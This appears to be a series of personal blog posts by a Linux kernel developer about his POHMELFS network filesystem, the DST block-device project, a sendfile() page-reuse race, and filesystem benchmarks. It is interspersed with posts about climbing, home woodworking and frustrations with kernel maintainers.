While we belive that NFS has coherent cache, since it is somewhat
write-through, its cache actually is not synchronous, since between
object creation and moment when other clients see new object really lot
of time can run, for example when client, which create an object, has
slow link... So, object creation and removal should not be synced to other
clients during writeback on one of them, instead clients which are interested
in object perform a lookup, which may or may not return object, this is not a
race or cache non-coherency, this is usual multithreaded environment without
client's synchronization.
What we really care about, is data consistency on the server. When we have
multipage write, which overlaps with another write from different client,
we should not read data back from the middle of the transactions. Locking the
whole file is not an issue, instead proper byte-range (page-range actually)
locking has to be implemented. I already have a
prototype,
but have to check it in real life.
So, other competing projects may or may not follow my way and drop
creation/removal/stat coherency from the TODO list (afacs, no one implemented
that yet :) based on my analysis and concentrate on server read/write locking.
And I will start some bits of VM hacking: plan is to implement generic enough
(well, working on x86 for start :)
mechanism to copy data from different (i.e. not that one which
started a syscall) thread to userspace, while original one sleeps in syscall,
via copy_to_user(). Likely it will be somewhat similar to what
I did for zero-copy userspace sniffer
and how get_user_pages() work.
Result, which has to be as fast as usual copy_to_user(), otherwise it is not
interesting solution, will be used in POHMELFS client and its async reading.
Client 1 Client 2
# ls -a /mnt/
. ..
ls -a /mnt
. ..
echo qwe > /mnt/asdasd
sync
ls -a /mnt/
. .. asdasd
rm -f /mnt/asdasd
sync
ls -a /mnt/
. ..
dmesg | tail -n1
pohmelfs_remove_response: parent: 2, path: '//asdasd'.
ls -a /mnt
. .. asdasd
As you might noticed, when one client creates an object and it is written back
to server (during writeback), it is broadcasted to all clients, which read the same
directory before. This information is stored on server in binary tree, so it takes
(M-1)*O(log(N)) time, where M is total number of clients and N is number of directories
they read. This can be further optimized though.
Objects are not removed from clients, when one of them remove it (and this is synced
to server via writeback), since so far I can not call sys_unlink() directly
from module, and I did not yet wrote code to deal with dentry cache (that will be siple),
instead you can see in dmesg, that another clients received a command and just need to drop
inode and dentry.
Also inode information is not broadcasted yet (for example when file size increases
or access rights are changed), so new files have always zero size. This informaion should be
broadcasted during writing, and since server is heavily multithreaded, this should not
hurt performance.
There is different opinion though: we do not need cache coherency at all, since the last writer
will overwrite data anyway, and when we open new object, we first look it up on server,
so if it was created there, it will be opened, but if it exists only in cache on some other client, we
do not know about it anyway. We can broadcast above messages during object creation on clients,
but this will be effectively write-through cache, since we can create object on server that time.
Anyway, I will proceed with either remove/stat messages, or with ability to copy data to userspace
from different thread. The latter looks like very interesting hack.
Moved to the 'Leroy Merlin' development shop to get lots of stuff and
found so huge crowd of people, that decided to run away as quickly as possible.
While walking there found couple of interesting things:
wood plates from small to 2000x600, which are perfectly polished, have
acceptible for table/shelf/cupboard development thicknes, and have too small price
to resist to buy. When I started my table developemnt there were no such things
in broad usage at all, but I will not stop, just because I found materials,
which allow to build it much faster and simpler. But for usual shelves I will definitely
get it there and will not implement things myself from real wood plates (those
ones are made using glueing technology from much smaller plates, I used similar to
implement thick enough part of my 'L'-style table).
bath cabins are incredibly ugly and unacceptibly bad-made. I knew that before though.
found bar installation, which want to setup at home - likely it will be my only
table in kitchen, I like it very much.
my kitchen (actually right now it is heavily used as joinery only)
has only 3/4 of walls covered with wallpapers, today I've known, that
my wallpaper model will not be sold anymore, so either I will have to reglue most of the
kitchen, or I will create some interesting installation on the remaining part of the walls,
and I think I already know what to put there: just like my blue wall in the room,
I will put some brick-like elements in the kitchen. As a ceiling light I will install a huge
wood beam hinged on chains with attached small lights. Or maybe not, who knows...
At home I attached '_' part of my 'L' table (it is not exactly 'L', but rounded very much),
and started the last painting layer. Also attached holders to the walls where table will be located
(my huge 2000x1500 or so table has only single leg close to the end of the longer part
of letter 'L', other parts are attached to the walls).
Maybe i will even install it today's night if colour will be ready.
He writes new or extends existing, but it is from different serie.
This one will tell you how one will be able to build a distributed
and then parallel filesystem using POHMELFS.
Headline says it all: POHMELFS server will not be placed into kernel
so far, since it is already very fast (compared to in-kernel async NFS server),
and userspace programming is a bit easier and mostly because there is no
need to wait about 10 minutes while servers come up after ipmi reboot,
since they are located somewhere I do not know where and there is no posibility
to quickly reboot them by hand, so servers have lots of things to bring themself
up even if something was really screwed, like network boot, add here scsi probing,
possible fsck, initial bios memtest (8GB)...
So, planned POHMELFS server updates:
PMCC - poor man
cache coherency protocol. Scheduled for the first half of the next week, btw.
server extension to allow storing data on multiple devices (like creating mirroring),
first by saving data in several local directories (think about server, which mounted remote
dirs over POHMELFS or NFS, and local dirs).
client/server extension to report lookup and readdir requests not only for local destination,
but also to different addresses, so that reading/writing could be done from different nodes
in parallel.
Somewhere at the beginning there is also a task to extend client to be able to
switch between different servers (if one goes down, client automatically reconnects to second
and so on).
And the most complex task is server parallelization, i.e. ability to have multiple
servers, which handle the same metadata, to work in parallel and be coherent. AFAIK, there
are no such (at least open) solutions, neither Lustre, nor PVFS2, nor Ceph,
nor glusterfs, nor whatever.
There are solutions to have master-slave setup (IIRC, Lustre works that way), Ceph has ability
to spread metadata between multiple servers, but they do not handle the same sets of objects,
so there is no metadata server redundancy.
So far I consider this as the most complex part, and I have not yet come to solution.
Rusty Russel is an author of the vringfd() (name says it all) new
interface for the event ring buffer management. Quotation from Andrew Morton:
This is may be our third high-bandwidth user/kernel interface to transport
bulk data ("hbukittbd") which was implemented because its predecessors
weren't quite right. In a year or two's time someone else will need a
hbukittbd and will find that the existing three aren't quite right and will
give us another one. One day we need to stop doing this ;)
...
So I think it would be good to plonk the proposed interface on the table
and have a poke at it. Is it compat-safe? Is it extensible in a
backward-compatible fashion? Are there future-safe changes we should make
to it? Can Michael Kerrisk understand, review and document it? etc.
You know what I'm saying ;) What is the proposed interface?
Just for the reference, I've filled it under kevent
tag :)
As you might know,
POHMELFS is a network
filesystem with client's cache of data and metadata. Any place with cache has to
provide cache-coherency algorithm to sync data with other users.
There are two common cases when caches become non-coherent:
client created/removed/modified object, which is not shared with other clients (i.e. this
object does not exist in theirs caches and no object with the same name was created on different
clients)
object being handled by one client exists in other caches
Poor man's solution for the above problems resolves quite easily: client will flush its changes
to whatever objects it wants during local writeback, this changes are then propagated to all
other clients, which worked with parent object (this information will be stored in server
each time client read dir or perform a lookup). For the first non-coherent case above client
will just receive a new object from the server, which will be easily imported into existing tree
(because of async nature of the POHMELFS it is trivial task, which right now works out of the box,
although only on client). For the latter case there might be problem if local object was modified:
in this case we can either replace its context with new data, or (better) to rename local object to
something different (like old name plus sync time), so that user could merge data manually.
So far there will be no locks, which will be implemented next.
After I spent two days implemententing real AIO for POHMELFS, following things happened:
Implemented 3 different AIO schemes, two of which could be zero-copy. Here is a brief description of them.
First, POHMELFS ->aio_read() callback schedules number of pages to be read from the server
(if page is already up-to-date, it is copied to userspace, otherwise network request is being sent), then
it waits...
when async data is received from remote side, appropriate inode and pages are found, then (physical)
userspace page is locked in memory and data is either received into that page, or received into VFS
cache page and then copied into userspace one. Then userspace page is unlocked.
when async data is received (note that it is received completely asynchronous in different thread) into
VFS cache page, received thread copies data into userspace via copy_to_user(). Since receiver
thread has completely different virtual memory layout, it can not simply copy data to provided userspace address,
first it has to setup page tables to be equal to userspace thread layout, in theory setting CR3 register
on x86 should be enough, but that's only theory, I was not able to fully complete this method, since eventually
thread crashed (obviously: userspace thread could be still active on different CPU, so installing the same CR3 register
for different CPUs pointing to the same page tables lead to crappy things). This interesting hack can be finished though.
when async data is received, pages are marked as ready and placed into list, so userspace thread can copy
them back via copy_to_user(). The simplest method. And it works great (graphs below).
found a bug in 2.6.25-rc7 shmem when removing 1gb file from it:
Bad page state in process 'rm'
page:c49948c0 flags:0xf7d4a600 mapping:00000000 mapcount:0 count:0
Trying to fix it up, but a reboot is needed
Backtrace:
Pid: 9454, comm: rm Not tainted 2.6.25-rc7 #11
[] bad_page+0x52/0x7a
[] free_hot_cold_page+0x5e/0x15a
[] __pagevec_free+0x18/0x22
[] release_pages+0xfb/0x142
[] __pagevec_release+0x15/0x1d
[] truncate_inode_pages_range+0xea/0x29f
[] __link_path_walk+0xa7e/0xb28
[] truncate_inode_pages+0x9/0xc
[] shmem_delete_inode+0x26/0xac
[] shmem_delete_inode+0x0/0xac
[] generic_delete_inode+0x88/0xec
[] iput+0x60/0x62
[] do_unlinkat+0xb7/0xf9
[] do_page_fault+0x2b6/0x6c2
[] do_page_fault+0x31e/0x6c2
[] sys_ioctl+0x2c/0x43
[] sysenter_past_esp+0x5f/0x85
[] pci_scan_single_device+0x377/0x446
Did not try to investigate (this is my testing server, not tainted with POHMELFS code).
Ran multiple tests...
Test details for the second round of POHMELFS vs NFS fight.
Hardware and software was already described in the first round,
I need to note, that server (2.6.25-rc7) has all debugging options turned off.
Tests performed: kernel tree reading
(find linux-2.6.24.4 -type f | xargs cat > /dev/null)
from disk over the net (XFS filesystem, cold server and client caches) and big file reading
from the tmpfs (to eliminate server disk latencies). Graph was added to the previous round results.
Note that async NFS and POHMELFS behave very similar with operations which involve reading from the disk,
that is because of disk latencies (although 10krpm SCSI disk used allows about 80 MB/s sequential read,
XFS behaves quite badly with lots of small files), tmpfs comparison shows advantages of the
POHMELFS network protocol.
Reading from huge remote tmpfs file is about 2 times faster for POHMELFS because of its AIO implementation,
although it is not main reason - server was almost always capable of handling requests from the POHMELFS client
one-by-one using one thread, which saturated bandwidth for about 70% (add here all debug options turned on on client).
One of the main factors I think is readahead being turned off - sync readahead has zero advantage in asynchronous
network filesystem, since while it waits for readahead to complete, it could schedule new requests, while
->readpage() method used in readahead waits until page is transferred, and only then
readahead code schedules new request. One can implement ->readpages() though.
Kernel tree reading micro-benchmark was also performed: POHMELFS has 2-times win because of its network protocol, which
batches (via TCP_CORK only though, I think I need to implement better directory reading command) server replies.
Another solution is to correctly implement transactional model, which is next task now.
Because of completely asynchronous POHMELFS
nature
it is possible to implement mulithreaded server, where not only requests from
different clients are processed in parallel, but also async requests from the
same users are handled simultaneously by pool of threads.
Such multithreading requires to introduce transactional model of the communications,
for example object creation and writing data, right now this race is handled
by sending a reply after creation, so the whole writeback sleeps waiting for that,
which drops performance (to NFS level). Transaction contrary will contain both operations,
which will be processed by the same thread without race. It can also handle
other problematic places with multiple server threads.
So far userspace server can run several or one processing thread per client,
but there is no transactions implemented. I just started
AIO
reading implementation, which should provide great speedup for any reading
workload.
Hardware (both client and server have the same hardware).
4-way (2 logical (HT) + 2 physical cpus) 3.00 Xeon (32 bits with PAE :), 8 GB of RAM,
Intel 82541GI gbit adapters, Seagate ST3300007LC 10k rpm scsi disk on
Adaptec AIC7902 PCI-X Ultra320 SCSI adapter.
Software.
Server: 2.6.25-rc7 kernel, in-kernel NFS server, userspace POHMELFS server.
Client: 2.6.25-rc8 kernel, in-kernel clients.
Both have all kernel debugging turned on.
Round 1. Huge directory (linux-2.6.24.4.tar archive) untarring over the network.
Picture shows it all.
Notice, that there is no test for POHMELFS reading (that is why it is only first round),
since it is miserable. And I know the reason: I'm lazy, so I use generic reading function
(generic_file_aio_read()), but actually Linux does not have AIO reading from usual files,
so it is very synchronous and requires to read data page-by-page, so we have a pretty
broken system in regards to network performance.
Since reading is not async, so I will reimplement generic_file_aio_read() as
pohmelfs_aio_read(), which will be a real AIO reading function. That will be second round,
where POHMELFS will win.
But it can not win the game. Because things are changing. Today I've known, that
if filesystem has only 20 users over the world, then it
should not be
merged, since burden
of changing something generic in VFS (and thus propagate it to filesystems)
is too high.
What has happend? Linux kernel maintainers started to be afraid of changes?
Afraid of more code? Afraid of something new they do not want?..
Eh, and they tell they want more developers... They want monkeys who will do only what was
asked them to do.
POHMELFS will be sent for review of course, but it is highly unlikely
I will push it upstream.
When user fills the bug, developer is supposed to fix it. That is
obvious and of course true.
But interesting things start showing in details.
If user piss developer off, it is ok. If developer throws something back - it is bad.
If user does not answer, it is ok. If developer keeps silence - he is a bastard.
If user fills bug, it is ok. If developer asks user for some help - developer is a fucking monster.
Yes, there are real jerks in development community as long as in users,
and getting simple numbers: user community is much bigger than development one,
so number of crappy people scales as well. And nevertheless, people like to
blame developers and pray to users. This comes down to absurd, when developer
asks for help, and then he is blamed for not devoting time to solving a problem.
People like to look at others. I like to look at others too of course.
And we frequently like to forget that we behave exactly like those who
we blame to be jerks. Exactly like them. We just forgot that, or do not pay
attention, or do not want to think about,
since when things come to us, this becomes a hypocrisy.
Problem happend to be quite simple: writeback happens for
inodes in sb->s_io superblock list. They are placed
there from sb->s_dirty list, which contains dirty inodes.
Dirty inodes can be placed into that list via mark_inode_dirty(),
which checks if inode is hashed, if it is not, then it will not be placed into dirty list.
Hashed has a synonym in comments: valid...
There is sb->s_op->dirty_inode() superblock operation callback, which is invoked
first, so one can still implement own inode cache, do not use inode hash tables, do not
hash inodes and still put inodes into dirty list and thus be able to run writeback on them.
VFS: Busy inodes after unmount of pohmel. Self-destruct in 5 seconds. Have a nice day...
After removing private cache of inodes I found, that objects, which were
sent by the server and which were never attached to directory entry (dentry),
will never be freed.
So, essentially this does not work with Linux VFS:
iget()/iget_locked()
...
umount
Inodes, created by iget()/iget_locked() will be placed into at least three
different lists:
inode_in_use - global list of ever created inodes, which have i_count and i_nlink
more than 0
s_inodes - per superblock list, which contains every inode, created for this superblock
inode_hashtable - hash table indexed by inode number. If you want to
work with writeback,
your inodes have to be there. Did not yet investigate why.
So, essentially all inodes, which you created, are accessible by VFS and will be checked
during umount via generic_shutdown_super()->invalidate_inodes(),
where system will notice that if inode in s_inodes list has non-zero reference
counter (or course, otherwise it would be already freed by filesystem), then this inode
can not be freed. Thus we have a leak.
Above lists can only be accessed under global inode lock, so it is not a good idea to destroy inodes
traversing them in for example ->put_super() callback or in any other filessytem callback,
so I had to add a list of all inodes into POHMELFS superblock. Ugly.
Just found an article at LWN
about get_user_pages(). Main problems happend to be a locking
between multiple threads...
Out of curiosity, was this
scalability problem fixed (for the busy reader: this is my more than 2-years old
testing of the get_user_pages() performance with single thread,
ran to find bottlenecks in kevent
AIO).
It has developed very rapidly last couple of days,
so essentially I rewrote it. I think it is ready for the next
release, which I will announce in a day or so.
Right now all first-milestone features except cache-coherency (check below),
which I planned, are completed (although maybe not in the most
optimal way sometimes).
Because of name cache usage it is now possible to create huge pathes
with multiple directories via single command. The same applies to directory
removal,
although it is because of different design issue.
It would be possible to rewrite generic read/write helpers and provide
set of pages into POHMELFS network stack (which is page
based for data now), but I decided that for the first
step it is not needed.
POHMELSF has now fully async processing of all operations except link creation
(I just decided that it is a bit simpler to make them write-through,
it was done because of laziness and not some fundamental arch problems).
It was achieved by serious (read: from scratch) changes in the arch,
which had own problematic places, namely error report. Because of this
move it becomes really simple to implement any kind of protocol, if it obeys
async rules, namely sending of the message never requires sync reply,
and where it is needed, reply comes as an independent incoming message,
which is processed asynchronously from waiting and via common state machine.
Such arch allows to have simple cache coherency algorithm, when server just sends
a missed entries or commands to remove some objects and client's core handles that just
fine since its reciving code does not depend on sending one. This is not
100% correct way to handle collisions (collisions thus became new objects
in the filesystem tree, like old name plus some suffix), but it is what lots
of the users need, but not real cache-coherency.
Writeback cache does not play very well with cache-coherency, since every metadata
changes (like object creation or removal)
has to be checked against server state, since different clients can do the same with
the same object. Level of paranoidality has to be thought of in advance.
First cache-coherency step is implementation of the trivial scheme, when
every object is synced during its writeback time and changes being broadcasted by server
to other clients. If another client has the same object being processed
it can either be renamed to collision or just overwritten. Having locks
and thus real states is a next step.
Also, POHMELFS does not have authentification and strong checksums right now,
and although this is a simple task to implement, its priority is questionable.
There is also possibility to implement cryptographically strong encryption of the
communication channels.
So, lots of ideas, but main part is ready - async data processing design was
definitely a right choice to implement, so all other features become very simple
to complete.
New release will be announced very soon, stay tuned!
Quite for a while a have quite interesting but very antisocial theory in my
mind. A hacker's behavioural theory.
Lets talk about male here (frankly, I never saw a female hacker with similar
behavioural aspects).
Main theory key is about the fact, that when person has something really
interesting for himself, he does not want to spend his (limited)
time with others. Just because he is so selfish (in a good meaning of this word),
that he just does not need any one near to spend time with, just because he can
create or get real problem for himself and devote all the time to it. There can be lots
of other people around, but eventually (if they are not a really good friends,
who understand that immediate timeframe does not matter) all they understand
that theirs time does not return back.
Such people do not really think about others, they think about the problem, which
lives in mind right now. This does not always mean that they do not like other people (which
actually can be true), but only that they are somewhere in another place with
another thoughts.
Maybe they will return back to usual life and devote theirs time
to other people not to some problems, or maybe not...
This is a new motto for POHMELFS.
It is a completely new filesystem now.
POHMELFS got new page processing code (sending side: commands and data), new lookup,
which is based on the Linux VFS inode cache without reinventing the wheel (comment
says it is very smp-friendly, although I do not quite understand how
it is possible with global inode_lock), it also got
completely new object creation and referencing path. It is possible
to create a huge path (up to 4k, but can be easily extended if there will be such demand)
with multiple objects in it with only single network command.
But the main feature of new POHMELFS is its name cache. I did not find
how to hook into VFS dentry cache, so invented own. It is fast
to travers from child to the highest level parent, which is actively
used in POHMELFS writeback path. Although it is not 100% the best
storage, but a simple RB-tree (and thus requires smp-unfriendly mutex), the whole
idea shows its gains already. Eventually it will be replaced with
faster and more scalable approach protected by RCU (even properly sized hash
table will show better scalability, although dynamic resizing of hash tables
prevents RCU usage), but I started from the simplest ground.
POHMELFS already outperforms async NFS during untarring and completely saturates
my testing Xen domains (both network and disk speed), while NFS is almost two
times slower. Testing machines have 256 Mb of RAM, maximum 3 MB/s interconnect speed
(something is broken in Xen setup likely, since it is supposed to be 100 mbit/s
and there is no high load), which is very unfriendly (read: in such scenario POHMELFS
will show its worse results) for POHMELFS, but nevertheless it is fast.
It became not only much faster, but also simpler. Its userspace server has
two times less lines of code (816 vs. 1613), kernel side is smaller and simpler too:
mainly there are no zillions of different trees indexed by any possible keys,
so far only per-inode tree of child names for readdir and per-superblock path
entry cache.
There are drawbacks of course: there is no receiving code (at all). It will be a dedicated
thread, which will asynchronously process all incoming packets (mostly
readdir async return, read page content and cache-coherency messages). First
two are really simple. The last one will be implemented as a full MOSI/MSI
library for inode content. Likely it will be possible to use in my
other projects.
P.S. I frequently think that I'm very good vapourware seller :)
Stay tuned!
B e c a u s e i t m o r e e a s i l y a l l o w s y o u r e y e s t o s e e t h e d i f f e r e n t o p e r a t o r s .
The same applies to more common:
for (i=0; i<10; ++i) vs
for (i = 0; i < 10; ++i)
The latter just wastes lots of space and forces eyes to move out of orbits.
That is my own opinion, obviously the more people involved, more opinions strike.
So, never kick someone when he is on the edge forcing him to change simple stuff in codying style,
he can return and kick you back, when you will be on own edge...
Ugh, and forgot likely the favourite one:
for (i=0; i<10; ++i) vs
for (i=0; i<10; i++)
Update: Oh holy crap: I recall people compared theirs uptimes to show which dick is longer who is more cool,
but comparing number of whitespaces-instead-of-tabs-errors per subsystem is a real winner of the modern
cruel reality! Hope you have a sense of humor, lets convert number of errors per 1000 lines of code
into length (100*kloc/errors):
kernel/ maintainer has this big: ===========D
arch/alpha maintainer has this big: =D
arch/arm maintainer has this big: ==D
arch/avr32 maintainer has this big: ============D
arch/blackfin maintainer has this big: ===================================D
arch/cris maintainer has this big: =D
arch/frv maintainer has this big: ====D
arch/h8300 maintainer has this big: =D
arch/ia64 maintainer has this big: ==D
arch/m32r maintainer has this big: ====D
arch/m68k maintainer has this big: ==D
arch/m68knommu maintainer has this big: =====D
arch/mips maintainer has this big: ====D
arch/parisc maintainer has this big: D
arch/powerpc maintainer has this big: ==D
arch/ppc maintainer has this big: =D
arch/s390 maintainer has this big: =D
arch/sh maintainer has this big: ====D
arch/sparc maintainer has this big: ==D
arch/sparc64 maintainer has this big: ===D
arch/um maintainer has this big: ==D
arch/v850 maintainer has this big: ===D
arch/x86 maintainer has this big: =D
arch/xtensa maintainer has this big: ==D
And couple of my projects:
fs/pohmelfs maintainer has this big: =======D
drivers/block/dst/ maintainer has this big: ============D
drivers/connector maintainer has this big: ===D
drivers/w1 maintainer has this big: =======D
That was quite short although quite hard training. After
number of warming traverses I started jumping again - now
I created a 'trace' myself of the huge
horizontal negative slope, so some times I fell to the back
from about meter, which was even fun. Eventually I managed
to complete own jumping holds, which resulted in a very
rubbed fingers both on feet and arms, so essentially rest
of the training was predefined to be something trivial.
Nevertheless I managed to try some old complex start
couple of times, fell of course, but it was worth it.
Usual finish of the training - sauna - today was exceptionally
dry and hot - about 99 degres Centigrade and it was even
hard to breath, since air was so dry.
Anyway, excellent time!
So essentially there is no way to implement own inode
cache tied to system's writeback mechanism, which is a bad
news. POHMELFS in its current reincarnation does not use
system's inode cache and all its indeas are unhashed, which
results in a fact, that they are never synced, since writeback
mechanism just does not see them.
So I will fallback to hashed inodes, which will be used just for that,
and writeback for single inode will end up creating directory structure
for the all upper layer objects.
Another idea is to implement own writeback, which would be scheduled from the
main one or after memory notifications, this approach has lots of
advantages actually, but let's first complete simpler part with hased inodes.
This is called learning curve - I'm essentially where I was before,
but with extended baggage of knowledge.
Summary of the
previousseries
with this pompous header:
when sendfile() returns, pages which it sent can still be queued in tcp
stack or hardware, so subsequent write into them will endup in
corrupting data which will be eventually sent. This concerns all
->sendpage() users namely sendfile() and splice().
We can only safely reuse that pages only when ack is received from the
remote side, which will force network stack to release pages.
My simple extension allows to hook into data releasing path and perform
any actions we want. This is achieved by replacing skb->destructor with
own callback registerd by interested user, for example splice/sendfile
code. Splice (pipe info structure) in turn is extended to hold atomic
counter of the pages in flight (without structure size change because of
alignment issues it has right now), so splice code will sleep when full
pipe info (->nrbufs pages) have been sent, it will wait until number of pages
in flight hits zero, which is decremented in private splice callback.
Patch was tested with simple send and recv applications, which can be
found in archive.
One has to run them on different machines, since loopback uses a bit
different scheme (namely page is _never_ copied, so when it is received
by 'remote' side, it still exists on the 'local' side, so modifications
will endup in data corruption).
devfs1# ./recv -a 0.0.0.0 -p 1025 -c 1024
devfs2# ./send -a devfs1 -p 1025 -f /tmp/test -c 1024
In case of failure you will get this:
Connected to devfs1:1025.
/tmp/test/1024 -> devfs1:1025
Data was corrupted: ab.
after short period of time, where above 'ab' is a hex byte writen into
mapped file, which has been sent, immediately after senfile()
returns to userspace.
Data is supposed to be always zero, and applications should run forever. -c parameter specifies number of bytes to be sent in each run of the
sendfile(). It has to be the same on both machines.
Suddenly it started to eat my CPU by getting time every 50ms... I can not
say why it is needed, except some sign of AI calibrating
its ion cannon. Fortunately it was killed before any damage (except
screaming cooler on the processor) was made.
Couple of days ago I talked with person, who ordered 4 high-end 128G SSD disks
to create RAID for testing purposes, seek time for that devises is 0.1ms.
Each one costs about $4k. His main workload is databases, i.e. random reads and writes,
so we calculated that theoretically it has to be about 14 times faster than
high-end scsi disks with 3.5 ms seek latency and about 100Mb/ssequential access speed
in given
workload for processing random data at 8-16kb chunks (usual 'page' in sql servers).
Besides the fact, that putting 14 disks into mirror will
be as fast as single ssd disk (theoretically), it will be 14 times more reliable
and likely have smaller price,
main workload is to replace RAM with SSD, not disks with SSD.
My prognosis is that SSD will be at most 2-3 times faster (if will be fater
at all, since its theoretical performance advantages can be killed by FS)
than SCSI disk for
given workload, and as is, it is not a breakthrough technology.
If I'm wrong (it will be tested likely next week with
sysbench read-write benchmark),
I will buy a good bottle of whiskey for us, otherwise...
So, I have to admit that I rethought my
opinion
about mirroring/redundancy at filesystem layer - it is useful for lots of cases,
and modulo bugs in
DST
mirroring (mostly a leak, which I can not find in my lab,
and network/block layer race,
which exists in sendfile() for years and just strikes DST a lot,
which has a workaround though) I decided to rewrite mirroring algorithm in a way
it could be used in other projects.
There is also an idea of how to fix abovementioned network/block layer race in a
very non-disturbing manner, which was privately called soft
DST barriers.
Idea is to replace skb destructor with private one, which will commit that
pages are no longer used (for example call bio_endio() or
release splice buffer), this callback will be installed only for special sockets,
which provide it (like DST, sendfile() or any other
->sendpage() users like samba). Idea was
not killed on its roots,
which is a good start sign.
I actually do not understand what prevents filesystem writers to implement
trivial interface and access library for metadata manipulations,
which would allow not only path lookup,
but also lookup for various keys, for example stored in extended attributes.
Yes, it requires filesystem changes, but I can not believe it is impossible
or even too complex.
Need to think...
DST
project was quiet for a while, but actually it is not.
There is a bug in mirror algorithm, which I consider to rewrite. Not becuase of
this bug, but because it will be used in special setup, where its extension required.
Consider a high-available *SQL cluster with multiple storage nodes combined into
mirror and several main systems, which operate with database software. Unfortunately
only single main system works with queries, other has to be turned on when first one fails.
Task is to create a system, which will automatically switch between main nodes and
recover if either main nodes or storage nodes become unavailable, so that the whole
system does not stop if something wrong happend with machines. It has to scale
to tens of nodes as a must and later hundreds without problems.
This is not a performance scalability solution - so far only single node should be able to
collect multiple data nodes into storage, and if that node fails it has to be switched,
but so far I do not know any working and free solution for the problem. But solution created
for the main node switching can be used in cases when any server (for example metadata server
in cluster) failed and has to be switched.
It will also force me to finally implement barriers in DST.
As a possible helper for availability messages
I consider abandoned CARP-like
protocol (in userspace).
That was hard training, since I climb once per week (this year so far) only,
I can not get my the best shape, mostly in resistance part, so fingers
were rubbed quite quickly...
Nevertheless I finished my
jumpings
and reached the needed hold. Jump actually was not that high - about 30-40 santimeters,
but it should be done from holds which are about 2 meters below the final hold,
so it was not that simple, especially when holds for arms are only 10 santimeters
higher than that for legs, and main body's chakra (it is a nice name for the ass
in my own public dictionary) really does not like to fly and wants to land.
Then I did number of various starts, some with jumps, others were just usual
complex traces without additional requirements from me...
Evening sauna, shower and great pleasure of the day.
Excellent time!
The simulation works on each filesystem in the following stages:
The empty filesystem is created and mounted.
The directory structure is created, with no files.
A single delivery simulator and retrieval simulator are run
simultaneously. The script waits for each of the simulators to finish,
and then runs the sync command before proceding to the next
step.
The above step is repeated with 2, 4, 8, and then 16 delivery simulators.
Delivery Simulator.
The delivery simulator does actual maildir deliveries to the given directory:
It writes a file with a unique file name to the tmp subdirectory.
It fsyncs the newly written file.
It renames the file into the new subdirectory.
It fsyncs the new subdirectory (to ensure that
directory is actually on disk, as most Linux filesystems don't
automatically perform this action during the rename).
Briefly saing, it is multithreaded maildir simulation.
And results
are quite different compared to for example postmark: very good results from xfs, jfs and reiserfs.
There are no ext2 and btrfs filesystems, since perl's fsync says that
filedescriptor opened there is invalid:
Invalid argument at /root/fs_bench/maildir_fsbench/fsbench/fake-deliver line 38.
Interested reader can check sources and show me a problem, but ext2 worked pretty fine with
2.6.20 kernel and to date glibs/perl/whatever was in Debian.
Now all testing is over.
Main conclusion: things got worse compared to 2.6.20 and there was no major breakthrough in filesystem development at least
from perfomance point of view.
Results are slightly better than
previous
xfs run, although barriers are turned off, which I blame to be the main reason. Other
filesystems did not turn off directory atime also.
Anyway, even with this results XFS is still much worse than any other FS (except reiserfs)
for this workload.
Interested reader can check out results
of the ext2/3/4, reiserfs, reiser4, jfs, xfs and btrfs fight for the first prices
in dbench,
iozone,
postmark,
maildir performance bench
and simple file creation micro-benchmark.
It does not contain maildir benchmark, I will add it tomorrow or later today,
xfs has yet not completed and no graphs.
As a conclusion: nothing major changed since
previous contest,
new btrfs filesystem behaves not that bad in some cases,
but quite slow in others... Nothing changed.
I've started mostly from scratch, I think it is a good sign,
when project can be rewritten without any pain to implement a really
interesting ideas instead of having multiple crutches all over the
place. This also means that it is not that complex, so I do not regret
about dropped code.
Now it is in a very testing stage without network protocol at all,
but I test new paradigm in the pohmelfs: its inodes will not be hashed
into global hash table, but instead will be placed into local
trie-like structure, which (optionally) will allow RCU-fied lookup.
Something similar to data structure created for
multidimensional trie
used for unified socket lookup patch.
I very like
two-hash
approach, but since there is no proof (yet) it will work for all possible cases,
I will first implement radix-like tree to store object names. Network
protocol will also operate on full-length pathes, which actually can be
a bad idea, I will see.
Another uber cool feature of the full-path approach
is ability to create number of directories, which form a path to given
object, in a single command, i.e. when client sends a network command
to create object /a/b/c/d/file, there is no need to send
separate commands to create /a, /a/b and so on,
it can be done automatically by server. This requires to send not only
path though, but also information about permissions for each subdir.
Although I plan to run additional couple of tests for
btrfs,
namely all tests for nodatacow option and without ssd option,
which will likely take part of the day. But all others were
already completed, so expect nice graphs tomorrow.
There was number of surprises during that testing. For example
reiser4 constantly freezes the test box in dbench workload
with 150-200 threads. There are no messages in dmesg, but nothing
is turned on in kernel hacking section of the config. Both
btrfs and reiser4 are very slow creating and writing into
lots of small (4k) files. Reiser4 is two times faster than btrfs,
the latter creates/writes/syncs/closes about 10 files per second
average when 10k-30k files are created one-by-one.
Ext4 is also slower than any other (except above two) filesystem
in this microbenchmark.
Something strange was made during 2.6.20-2.6.24 kernel: above file
creation microbenchmark produced much worse results for all
filesystems (magnitude of 10 in some cases) compared to previous
contest.
Maybe sync code was implemented correctly, I do not know...
I will likely drop maildir
benchmark results, since perl script which works there constantly tells me,
that fsync() has invalid parameter...
So, wait about 12 hours (I have to have some sleep: do not mix
absinthe with different red wines and beer, when I did that yesterday/today
night, it was quite tasty, but not todays morning)
Subvolumes
are block devices on top of which btrfs
can be created. This is first known filesystem in Linux which can be built on
top of multiple block devices. Chris Mason renamed his unstable branch to
really-really unstable because of that. It is possible to put devices into
mirror or striping mode, although it is far from being clear from short
mail description.
Although support for mirror and striping in filesystem is questionable feature,
ability to create filesystem on top of multiple block devices with per-device
allocation policies is a huge step in Linux filesystem development.
So far I removed maildir
test and file creation benchmark, the former requires manual start in my
scripts, the latter requires some filesystems to be removed from the run,
namely Reiser4 and BTRFS, both are very slow creating and writing into lots of small
(4k) files. XFS is probably also a candidate, although with optimizations, described below,
it behaves much better than with default options and 2.6.21 tree.
Testing is being performed with 2.6.24.3 tree, Reiser4 was ported from the latest
breakout of -mm tree (requires lots of manual patching to be started on recent kernels).
BTRFS was taken from the unstable
branch, since it is the same as 0.13 AFAICS. All other filesystems were taken from the
vanilla tree.
There are following optimisations for the filesystems:
XFS: mkfs: -d agcount=1 -l size=128m,version=2, mount: noatime,logbsize=256k,
as suggested by Dave Chinner
BTRFS: mkfs: -l 4k -n 4k, mount: noatime,nodatasum, for postmark also added ssd option,
as suggested by Chris Mason
First results are expected to be ready tomorrow evening or even (past)weekend... Although all runs
are being performed automatically, nice graphs
generating requires manual start. Then I will proceed with
maildir
test and file creation benchmark.
That was really cool training today: the most exciting
